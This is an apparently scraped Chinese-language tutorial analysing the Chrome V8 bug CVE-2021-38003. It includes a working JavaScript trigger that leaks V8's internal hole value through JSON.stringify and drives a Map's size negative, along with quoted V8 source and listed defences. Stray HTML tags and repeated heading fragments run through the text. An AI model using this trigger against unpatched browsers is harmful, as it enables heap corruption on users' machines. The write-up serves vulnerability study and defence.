Chrome V8 CVE-2021-38003 漏洞分析与教学文档<\/h1>

1. 漏洞概述<\/h2>
CVE-2021-38003 是 Chrome V8 引擎中的一个漏洞，影响 Google Chrome 95.0.4638.54 (Official Build) (x86_64) 版本。该漏洞源于 V8 对 JSON.stringify 异常处理不当，结合 Map 对象的删除操作，可导致堆损坏。<\/p>

2. 漏洞原理详解<\/h2>

2.1 漏洞触发流程<\/h3>

通过 JSON.stringify 触发字符串构建器溢出，获取特殊的 HoleValue<\/li>
将 HoleValue 作为 Map 的键进行操作<\/li>
通过特定的删除操作序列导致 Map 内部状态不一致<\/li>

最终导致 Map 的 size 变为负数，造成堆损坏<\/li> <\/ol>

2.2 关键组件分析<\/h3>

2.2.1 JSON.stringify 异常处理<\/h4>

JSON.stringify 在处理大字符串时使用 string builder 容器，该容器的容量上限是 String::kMaxLength<\/code>。当溢出发生时：<\/p>


正常情况下溢出异常应被 V8 的异常队列捕获<\/li>
但 JSON.stringify 的溢出异常未被 V8 捕获，而是返回到了用户态<\/li>
用户可以通过 try-catch 捕获到特殊的 HoleValue（V8 内部表示空值的变量）<\/li>
<\/ul>
2.2.2 Map 删除操作机制<\/h4>
Map 的删除操作 (map.delete<\/code>) 内部实现：<\/p>

查找要删除的键值对<\/li>
将键和值的位置用 HoleValue 填充<\/li>
更新 Map 的 size (size = size - 1)<\/li>
检查是否需要触发 Rehash 操作清理 hole<\/li>
<\/ol>
关键条件判断：<\/p>
GotoIf(SmiLessThan(SmiAdd(number_of_elements, number_of_elements),
<\/span><\/span>                  number_of_buckets),
<\/span><\/span>       &<\/span>shrink);
<\/span><\/span><\/code><\/pre>当 number_of_elements*2 < number_of_buckets<\/code> 时，会触发 Runtime::kMapShrink<\/code> 进行 Rehash。<\/p>
2.3 漏洞利用关键点<\/h3>


获取 HoleValue<\/strong>：<\/p>

通过构造大字符串使 JSON.stringify 溢出<\/li>
捕获返回的 HoleValue<\/li>
<\/ul>
<\/li>

Map 操作序列<\/strong>：<\/p>

先添加一个正常键值对 (如 map.set(1, 1)<\/code>)<\/li>
然后添加 HoleValue 作为键 (map.set(hole, 1)<\/code>)<\/li>
执行两次删除 HoleValue 的操作<\/li>
最后删除正常键值对<\/li>
<\/ul>
<\/li>

避免过早 Rehash<\/strong>：<\/p>

map.set(1, 1)<\/code> 用于"凑数"，确保第一次删除后不满足 Rehash 条件<\/li>
这样可以在第二次删除时造成 size 变为负数<\/li>
<\/ul>
<\/li>
<\/ol>
3. 漏洞代码分析<\/h2>
3.1 测试用例代码<\/h3>
function<\/span> trigger<\/span>() {
<\/span><\/span>  let<\/span> a<\/span> =<\/span> [], b<\/span> =<\/span> [];
<\/span><\/span>  let<\/span> s<\/span> =<\/span> '"'<\/span>.repeat<\/span>(0x800000<\/span>);
<\/span><\/span>  a<\/span>[20000<\/span>] =<\/span> s<\/span>;
<\/span><\/span>  for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 10<\/span>; i<\/span>++<\/span>) a<\/span>[i<\/span>] =<\/span> s<\/span>;
<\/span><\/span>  for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 10<\/span>; i<\/span>++<\/span>) b<\/span>[i<\/span>] =<\/span> a<\/span>;
<\/span><\/span>  try<\/span> {
<\/span><\/span>    JSON<\/span>.stringify<\/span>(b<\/span>);
<\/span><\/span>  } catch<\/span> (hole<\/span>) {
<\/span><\/span>    return<\/span> hole<\/span>;
<\/span><\/span>  }
<\/span><\/span>  throw<\/span> new<\/span> Error('could not trigger'<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>let<\/span> hole<\/span> =<\/span> trigger<\/span>();
<\/span><\/span>var<\/span> map<\/span> =<\/span> new<\/span> Map<\/span>();
<\/span><\/span>map<\/span>.set<\/span>(1<\/span>, 1<\/span>);
<\/span><\/span>map<\/span>.set<\/span>(hole<\/span>, 1<\/span>);
<\/span><\/span>map<\/span>.delete<\/span>(hole<\/span>);
<\/span><\/span>map<\/span>.delete<\/span>(hole<\/span>);
<\/span><\/span>map<\/span>.delete<\/span>(1<\/span>);
<\/span><\/span>console<\/span>.log<\/span>("Size"<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(map<\/span>.size<\/span>);
<\/span><\/span><\/code><\/pre>3.2 关键代码解释<\/h3>


触发 HoleValue 获取<\/strong>：<\/p>

创建超大字符串数组<\/li>
JSON.stringify 尝试序列化时触发溢出<\/li>
捕获返回的 HoleValue<\/li>
<\/ul>
<\/li>

Map 操作序列<\/strong>：<\/p>

map.set(1, 1)<\/code>：添加正常键值对<\/li>
map.set(hole, 1)<\/code>：添加 HoleValue 作为键<\/li>
第一次 map.delete(hole)<\/code>：正常删除，size减1<\/li>
第二次 map.delete(hole)<\/code>：再次找到并"删除"hole，size变为0<\/li>
map.delete(1)<\/code>：删除正常键值对，size变为-1<\/li>
<\/ul>
<\/li>
<\/ol>
4. 底层机制分析<\/h2>
4.1 JsonStringify 异常处理<\/h3>
RETURN_RESULT_OR_FAILURE<\/code> 宏展开：<\/p>
do<\/span> {
<\/span><\/span>  Handle<<\/span>Object><\/span> __result__;
<\/span><\/span>  Isolate*<\/span> __isolate__ =<\/span> (isolate);
<\/span><\/span>  if<\/span> (!<\/span>(JsonStringify(isolate, object, replacer, indent))
<\/span><\/span>       .ToHandle(&<\/span>__result__)) {
<\/span><\/span>    DCHECK(__isolate__-><\/span>has_pending_exception());
<\/span><\/span>    return<\/span> ReadOnlyRoots<\/span>(__isolate__).exception();
<\/span><\/span>  }
<\/span><\/span>  DCHECK(!<\/span>__isolate__-><\/span>has_pending_exception());
<\/span><\/span>  return<\/span> *<\/span>__result__;
<\/span><\/span>} while<\/span> (false);
<\/span><\/span><\/code><\/pre>当 .ToHandle()<\/code> 返回 false 时，返回 exception()<\/code>（即 HoleValue）。<\/p>
4.2 MapPrototypeDelete 实现<\/h3>
关键部分：<\/p>
\/\/ 标记条目为已删除
<\/span><\/span><\/span><\/span>StoreFixedArrayElement(table, entry_start_position_or_hash.value(),
<\/span><\/span>                      TheHoleConstant(), UPDATE_WRITE_BARRIER,
<\/span><\/span>                      kTaggedSize *<\/span> OrderedHashMap::<\/span>HashTableStartIndex());
<\/span><\/span>StoreFixedArrayElement(table, entry_start_position_or_hash.value(),
<\/span><\/span>                      TheHoleConstant(), UPDATE_WRITE_BARRIER,
<\/span><\/span>                      kTaggedSize *<\/span> (OrderedHashMap::<\/span>HashTableStartIndex() +<\/span>
<\/span><\/span>                                    OrderedHashMap::<\/span>kValueOffset));
<\/span><\/span>
<\/span><\/span>\/\/ 更新元素数量
<\/span><\/span><\/span><\/span>const<\/span> TNode<<\/span>Smi><\/span> number_of_elements =<\/span> SmiSub(
<\/span><\/span>    CAST(LoadObjectField(table, OrderedHashMap::<\/span>NumberOfElementsOffset())),
<\/span><\/span>    SmiConstant(1<\/span>));
<\/span><\/span>StoreObjectFieldNoWriteBarrier(
<\/span><\/span>    table, OrderedHashMap::<\/span>NumberOfElementsOffset(), number_of_elements);
<\/span><\/span><\/code><\/pre>4.3 Rehash 机制<\/h3>
OrderedHashTable::Rehash<\/code> 关键部分：<\/p>
for<\/span> (InternalIndex old_entry : table-><\/span>IterateEntries()) {
<\/span><\/span>  int<\/span> old_entry_raw =<\/span> old_entry.as_int();
<\/span><\/span>  Object key =<\/span> table-><\/span>KeyAt(old_entry);
<\/span><\/span>  if<\/span> (key.IsTheHole(isolate)) {
<\/span><\/span>    table-><\/span>SetRemovedIndexAt(removed_holes_index++<\/span>, old_entry_raw);
<\/span><\/span>    continue<\/span>;
<\/span><\/span>  }
<\/span><\/span>  \/\/ ...处理非hole键...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 漏洞利用条件<\/h2>

能够触发 JSON.stringify 的字符串构建器溢出<\/li>
获取到 HoleValue 并作为 Map 的键<\/li>
精确控制 Map 的操作序列：

添加足够多的正常键值对防止过早 Rehash<\/li>
对 HoleValue 键执行两次删除操作<\/li>
<\/ul>
<\/li>
最终导致 Map 的 size 变为负数<\/li>
<\/ol>
6. 防御措施<\/h2>

修复 JSON.stringify 的异常处理，确保所有异常都被 V8 捕获<\/li>
加强 Map 删除操作的边界检查，防止 size 变为负数<\/li>
对 HoleValue 作为 Map 键的情况进行特殊处理<\/li>
改进 Rehash 触发条件判断逻辑<\/li>
<\/ol>
7. 相关参考<\/h2>

Chromium Issue 1263462<\/a><\/li>
V8 JSON.stringify 源码分析<\/a><\/li>
<\/ol>

Chrome V8 CVE-2021-38003 漏洞分析与教学文档<\/h1>

1. 漏洞概述<\/h2> CVE-2021-38003 是 Chrome V8 引擎中的一个漏洞，影响 Google Chrome 95.0.4638.54 (Official Build) (x86_64) 版本。该漏洞源于 V8 对 JSON.stringify 异常处理不当，结合 Map 对象的删除操作，可导致堆损坏。<\/p>

2. 漏洞原理详解<\/h2>

2.2 关键组件分析<\/h3>

3. 漏洞代码分析<\/h2>

4. 底层机制分析<\/h2>

7. 相关参考<\/h2> Chromium Issue 1263462<\/a><\/li> V8 JSON.stringify 源码分析<\/a><\/li> <\/ol>

1. 漏洞概述<\/h2>
CVE-2021-38003 是 Chrome V8 引擎中的一个漏洞，影响 Google Chrome 95.0.4638.54 (Official Build) (x86_64) 版本。该漏洞源于 V8 对 JSON.stringify 异常处理不当，结合 Map 对象的删除操作，可导致堆损坏。<\/p>

7. 相关参考<\/h2>

Chromium Issue 1263462<\/a><\/li>
V8 JSON.stringify 源码分析<\/a><\/li> <\/ol>